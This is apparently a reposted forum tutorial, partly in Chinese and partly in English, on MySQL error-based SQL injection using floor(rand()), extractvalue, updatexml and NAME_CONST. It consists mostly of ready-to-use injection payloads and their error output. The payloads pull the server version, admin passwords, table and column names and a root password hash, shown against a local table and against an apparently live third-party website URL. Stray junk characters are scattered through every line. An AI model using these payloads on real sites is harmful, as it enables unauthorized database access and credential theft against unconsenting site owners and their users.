|
1、通过floor报错 可以通过如下一些利用代码 and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a); and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2))); 举例如下:2 v4 X; A: C* W ^" C% ]
首先进行正常查询: mysql> select * from article where id = 1;
2 p* _, H1 G8 ~9 l5 v( g* \+—-+——-+———+' V! O, m6 L7 K+ k8 q# J
| id | title | content |
4 w9 Z/ r1 |# }0 ]6 X+—-+——-+———+
4 s% g/ S( l) Y: k& o| 1 | test | do it |
! E& B8 ~ u8 D6 N+—-+——-+———+ 假如id输入存在注入的话,可以通过如下语句进行报错。 mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
* d# r- C/ h7 ~ f9 T% @ERROR 1062 (23000): Duplicate entry ’5.1.33-community-log1′ for key ’group_key’ 可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。. F0 r4 J3 `# p2 u/ K g
例如我们需要查询管理员用户名和密码: Method1: mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);; ~7 b/ ~6 j2 {* e6 @/ Y0 O
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ Method2: mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));# v! i$ \/ p/ q* M
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ 2、ExtractValue2 _- T/ ~0 _+ I6 J; p
测试语句如下 and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1))); 实际测试过程 mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–
' _* N1 V/ ]! |% fERROR 1105 (HY000): XPATH syntax error: ’\admin888′ 3、UpdateXml 测试语句 and 1=(updatexml(1,concat(0x3a,(select user())),1)) 实际测试过程 mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error: ’:root@localhost’ # U; U0 [0 m. ^8 B+ f
6 ]" {# w6 ~3 U8 p4 b* s
再收集: $ ~0 O8 R5 H3 P& x) A2 T( f# z
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c) * A7 i& Z& X. [( {- k
4 N7 P7 ?' m. e# p" BError uplicate column name ‘5.0.27-community-nt’Error uplicate column name ‘5.0.27-community-nt’& o% L* r0 h* @, _
5 X* g) x* f% {2 {* ~http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)
( f9 z" _- a. W5 f7 ^
( n* L/ H0 L; e# L: W {# iError uplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′Error uplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′ % b6 u4 e6 U, M+ Z7 r& V
k6 H+ B1 S* ~) s. O) R8 z' @MYSQL高版本报错注入技巧-利用NAME_CONST注入, ^ d" F( C& `; V' w. z
It's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it.
# i* z O& k+ }; S
8 O/ ~1 C/ r; l4 k) {7 u1 v4 x2 m7 \
相关信息
: {+ K& ]0 O% @" f. `( l8 ]1 ?3 N! h$ W8 {, e* g% ?# v/ i
NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.
7 {% u9 w5 L: Z, o
9 V) @5 X$ y" `0 _3 @. eCode:
( A9 T6 G. H1 B& kNAME_CONST(DATA, VALUE)6 H: j( b2 b5 }$ j. w
. r1 I# d2 Z8 V4 h3 EReturns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.. J: K, M2 ^8 H
5 g2 m, Q- Q( CSELECT NAME_CONST('TEST', 1). d) \$ n: Y2 |& q) e, T8 c6 w
# k+ S& D% Y& j* b0 V
6 p& O' R( s# A y5 H1 @2 v/ b' U( } w4 `* W/ b
|---------------|" p; [* J: t6 R% ?2 w
| TEST |% H6 V: e4 p- l4 ~/ ]2 \
| |
. ]' x1 ]/ w$ X|---------------|- x. H1 _( R5 y- v; M- f) L
| 1 |
3 w% m% t: @- R1 x| |% `3 K0 g/ u) ^, P/ ~; B( k
|---------------|
$ O7 b6 H) g$ \% [* z
) s; _. }8 d$ e" [6 J* q% E$ K$ g- t) ~" F
# g& | \6 D; @
+ u$ X% r- Q! O. L5 |http://dev.mysql.com/doc/refman/5.0/en/m...name-const
& ~! \& M/ P4 ?$ e6 J5 m8 h& IIntro to MySQL Variables. Z# x( K7 s2 e( y, Z
; b8 o6 _5 [, A) a, }% ?
Once you've got your vulnerable site, lets try getting some MySQL system variables using NAME_CONST.
) d* d( F: n7 Y( m. s% z; w$ i, z* x% C! o4 {. O# H4 r3 b0 S" M
Code:
: g# k8 i: F7 [http://www.baido.hk/qcwh/content ... ;sid=19&cid=261
( h* Z T# x! ^: h" L
% E7 j) t" X0 I
' o6 M! B- K, v) g0 p& z7 B" m6 x; a) |9 r
$ {& V! Q5 P' J2 h, t
& T- j$ p$ @3 ZCode:8 _5 {7 ^: u2 v" f8 N( {
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--) K' p9 m* ~) ], ?1 {
0 R W, k G7 d' [* Z7 N8 L8 z5 r4 M: W
& T/ ~/ ]3 R- tVAR = Your MySQL variable.
, k& W! x( B# V6 m @' K H4 w! H5 P! |' C
MySQL 5.1.3 Server System Variables# E; U/ ~1 l9 l! U+ W3 Z% P
# B( y% O, f" g2 Q z f1 `5 w: Q
Let's try it out on my site..2 j* v& X% Z u, X8 J Q& e. Z
9 U. V. ?7 ^* @8 g, ~3 [" S4 r7 r
Code:* M& j, ~- c* |, G
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--% |8 L/ }: j4 n% F* }" A
- v! R2 F% Q1 uError uplicate column name '5.0.27-community-nt'2 w, v! Q) a; J, ]+ ~% `+ Q4 l
5 U5 z8 {0 ~. e7 S' t/ g: G* W4 Q1 l# M' ?5 s) Y
) A5 |& {6 Y6 ^; A% z/ r J4 J( n* r5 @. O3 @
8 @2 S: Y0 Y4 m0 _
Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...0 i& \& c4 \& a3 M
) F" J' r1 h5 v P! B
Data Extraction
- ?' u6 T/ }1 A; J; K- k, h, @- {3 B) ]9 ]9 x, Z& W
Code:# T# H" g$ m8 M0 c- G& i
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--
( q" p- x/ _3 P- V; K+ x1 U& [, S5 P
V2 L! E6 j# T' g4 a+ }3 R0 Z# IWe should get a duplicate column 1 error...
, ]6 p2 u9 l8 J% W
1 q- h: C4 u0 t% e; XCode:4 ~+ {6 {( R8 k, _
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--2 o) k8 u2 m/ b2 Z/ T! [8 n7 q
! x3 p, K! `9 q6 ]) |5 A1 t3 p
Error uplicate column name '1
5 ?7 C0 e+ e) q9 A2 m, r1 f( Z, W. q9 d" s- O+ S& l" [
3 n& d" m; a( @7 W6 ~# _0 u
R2 K$ s$ E R3 q2 r3 u
, t& W1 S3 Z7 Y5 m( k+ C8 @* P3 Z- ]' h4 O' S( i- S
) H& h& X- J6 u0 E8 x S6 B( Z0 o0 CNow let's get the tables out this bitch..
# c3 j1 ?3 K. P& L4 }
& P5 ]1 X3 R1 I$ E9 c fCode:
0 ~% Q/ W6 x7 X+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--% I( [! E; n9 `
& n, C5 `" ~' c* @# _0 E" l! F
! d' I% x9 ] v9 P) O7 W
Let's see if it works here, if it does, we can go on and finish the job.' K3 p: k* Z) d, `0 b+ K- C
6 ~0 R0 J/ R1 N+ i4 o3 N) ]
Code:
: a- d6 f9 M O' _http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
* ^; ^/ |! V: ` o- C0 t0 v6 r+ [, J/ G1 Z
, L5 m6 ?( D/ `
Error uplicate column name 'com_admanage5 C% s1 p2 c! o# B$ z6 i9 r: G1 e3 M
* }5 `' y% @4 y7 s5 `6 h/ |
7 M: H: u1 O @3 c: X, b$ q. _/ k/ r' T9 i
* G- R- V$ s' L+ s% X0 @5 m
7 T9 D, b; v, M# v" B9 v
/ ?6 S: L7 f# Z: Z- v& |2 lNow I'm going to be lazy and use mysql.user as an example, just for the sake of time./ y. e4 B/ b7 F3 h
. E A1 T# } N- mLet's get the columns out of the user table..
( J( I( Z a3 i" e M$ [) Y% H. \" j5 M" F# U" x
Code:+ ^( I& S1 c8 P0 Y8 u5 b
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--
4 [& _0 g5 j9 \% H1 v1 r" t+ K! K7 q, _; I
5 N* s( M* }) E- }/ X$ K% ]. E, G, p
So mine looks like this, and I get the duplicate column name 'Host'.; G/ g0 {+ {" V. X/ Q! b
0 q2 }; a- {9 G, I) ]( f' Y" c- h; aCode:' b6 G& c8 e [
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--
3 I2 ]7 P) \7 x$ f0 m& k* j5 K7 R& M& \) V/ r4 N/ ~
Error uplicate column name 'Host'
3 v, Z3 d _5 ]* S! s
2 _9 }- e9 F7 J$ u/ g( t/ o3 A% P$ F$ ]& a1 K, I/ b3 k1 l$ L
- L" L+ T ]/ F8 i& y. s1 B: i8 p, O% W) p- Z* p, j3 a7 m
& V0 h. v+ `0 i9 F; D- }% V+ e) E3 ]# X' g+ M
Woot, time to finish this bitch off.4 B" L! @5 w' W
7 T( e" l7 c( G* }" u
Code:7 \5 c$ m X; i+ z% Q
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--
# i5 N3 n+ Q' Q, ^: X/ v, x, c/ l3 b0 i
4 Z' ?4 Z+ V) g2 S* x* t
So mine looks like this...
% Z! Z8 a& m; U, H9 H2 V: f# D4 v# C H" n
Code:
8 X+ V4 Y: G+ O2 Y0 A1 ~& c9 yhttp://www.baido.hk /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--
9 E( p3 g0 ^9 L3 ^, k( U6 O$ x* ~, Q$ |/ u; u6 @6 ~; F
Error uplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'0 b: p9 m4 P9 B
$ c% Y" G9 n+ \9 ]7 K5 l
# U& U4 ^6 t: {& X# m* h; F
4 A# |* J5 A+ x `8 b) N- `- k9 k0 V9 }9 N
( N5 g, ]1 _: o9 m0 o& t
* k! H8 R3 X |And there we have it, thanks for reading.. x, |/ C/ B9 v/ K! N
0 \" R" p B1 n, X$ s |